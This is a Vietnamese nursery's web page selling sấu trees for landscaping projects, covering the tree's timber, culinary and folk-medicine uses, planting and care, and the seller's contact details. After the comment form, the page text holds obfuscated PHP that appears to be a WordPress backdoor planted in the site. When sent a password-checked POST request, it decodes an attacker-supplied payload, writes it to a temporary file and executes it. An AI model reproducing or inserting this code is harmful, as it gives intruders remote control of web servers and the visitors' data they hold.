Bán cây Sấu công trình số lượng lớn, đảm bảo uy tín

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Vườn cây Hòa Bình chuyên cung cấp cây sấu tại Hà Nội

Bán Cây Sấu Công Trình giá rẻ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

 • Cung cấp cây sấu công trình đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng
 • Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại
 • Bảo hành dài hạn: lên tới 6 tháng.
 • Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

 

Cây sấu là một loại cây trồng quen thuộc đối với mỗi người Việt Nam. Cây sấu thích hợp trồng ở những nơi như đường phố, công viên, trường học, bệnh viện, công ty xí nghiệp…

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

Cây sấu là một cây có nhiều giá trị:

 • cây sấu không ra quả  được trồng để tạo cảnh quan, cho bóng mát cho khu dân cư, chống xói mòn, lở đất. Cây sấu được trồng để lấy gỗ.
 • Cây sấu có thân gỗ thẳng, có thể cao đến 30m; vỏ màu nâu đất và sần sùi; cây sinh trưởng nhanh, thân cây nhanh to. Giá gỗ sấu có thể trồng lấy gỗ, gỗ sấu chắc, dẻo và nặng, rất mịn, màu vàng nhạt, nhiều gia đình sành nghệ thuật thường thích làm đồ thủ công mĩ nghệ, đồ gia dụng từ gỗ sấu.
 • Những loại cây công trình đầu đang được rất ưu chuộng các bạn có thể xem tại đây : Cây công trình

 

Là món ăn, vị thuốc chữa bệnh:

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

 • Lá non của cây sấu có vị chua là loại rau sạch ăn sống, xào, luộc hoặc nấu canh. Lá non của cây sấu ăn được, không có độc, có thể dùng làm rau để ăn sống, luộc, xào hoặc nấu canh…lá có vị chua nhẹ. Trong thực tế ít có người dùng lá cây sấu làm rau.
 • Quả sấu xanh được dùng để nấu canh chua: rau muống luộc, canh cá  hay món sườn nấu chua; thịt quả sấu xanh xắt nhỏ dùng làm nộm, gỏi chua có vị chua thanh rất hấp dẫn. Nước dầm của quả sấu làm gia vị chua như nước mắm chua ngọt để chấm thức ăn.
 • Quả sấu được dùng để chế biến các món ngâm truyền thốngQuả sấu già ngâm muối, quả sấu ngâm đường.
 • Ngoài ra quả sấu còn được chế biến thành nhiều món ngon, hấp dẫn như món ô mai sấu, món mứt sấu. Quả sấu còn góp mặt trong thành phần khi chế biến thành 6 món ăn mới mà ngon tuyệt vời từ quả sấu như: Bún thịt luộc và sấu kho; Tôm xào sấu chua, canh sườn nấu sấu, thịt chưng sấu, cá kho sấu, vịt om sấu.
 • Các bộ phận cây sấu dùng làm thuốc chữa bệnh: quả sấu được dùng chữa các chứng bệnh như nhiệt miệng khô rát, ngứa cổ, đau họng, ho, nôn do thai nghén, say rượu, nổi mẩn, sưng, lở ngứa. Lá dùng nấu nước rửa chữa mụn loét, hoại tử. Quả Sấu chín chữa bệnh ngứa cổ khó chịu, làm long đờm, thanh giọng. Quả sấu cũng dùng trị bệnh nhiệt miệng khát, giải say rượu, chữa phong độc khắp mình nổi mẩn, mụn cóc sưng lở, ngứa hoặc đau. Quả sấu chín ngon, và còn dùng làn thuốc chữa sâu răng.
 • vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

 

Kĩ thuật trồng và chăm sóc cây sấu công trình sai quả

Đất trồng

Cây sấu là loại cây công trình không kén đất, tuy nhiên để cây phát triển tốt nên trồng  ở vùng đất cát pha đất thịt. Hố trồng có kích thước 0,8 – 1m, bón vôi phơi ải từ 15 – 20 ngày trước trồng để xử lý các mầm bệnh có trong đất. Sau đó khi trồng, bón mỗi hố 20 – 30kg phân chuồng hoai mục + 0,2 kg lân.

Chăm sóc cây sấu công trình

 

Cần cung cấp đủ nước cho cây nhất là trong mùa khô, khi trái đang lớn và lúc quả sắp chín.

Phủ gốc sấu bằng cỏ, rác, cây phân xanh… để hạn chế cỏ dại; xới phá váng sau mỗi trận mưa to. Làm cỏ vụ xuân tháng 1 – 2 và vụ thu tháng 8 – 9, xới sạch toàn bộ diện tích một lần/vụ; một năm xới gốc 2 – 3 lần. Hàng năm sau khi phát dọn vun xới xung quanh gốc cây, tiến hành bón phân. Tùy theo sự phát triển của cây mà ta bón liều lượng khác nhau, khi bón rạch thành rãnh xung quanh cây theo hình chiếu của tán cây, cho phân rải đều xuống rãnh, sau đó lấp kín phân và tưới nước. Trong 2 – 3 năm đầu, mỗi năm bón 2 – 3 lần, mỗi lần 0,2 – 0,5 kg NPK. Khi cây lớn lượng phân bón tăng dần.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

Thu hoạch

Sau khi ra quả khoảng hơn hai tháng thì trái sấu đạt đến độ già nhưng chưa chín. Đây là thời điểm thu hoạch sấu vì khi ấy quả sấu đủ già để có thể giữ được sấu lâu hơn và cũng là lúc sản phẩm sấu được sử dụng vào nhiều mục đích nhất. Mùa sấu thường kéo dài khoảng 2 – 3 tháng (từ tháng 6 – 9 hàng năm).

Hãy liên hệ với chúng tôi để chọn lựa được những cây sấu công trình đẹp nhất, đảm bảo chất lượng, nhanh ra quả.

Thông tin liên hệ: Vườn cây Hòa Bình

 • Mr. Nguyễn Trường Giang
 • Hotline: 0962.376.560
 • Gmail:vuoncayhoabinh.com@gmail.com
 • Địa chỉ: Tổ dân phố Hoà Bình 2, Biên giang, Hà Đông, Hà Nội

Nguồn bài viết: Tại Đây

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}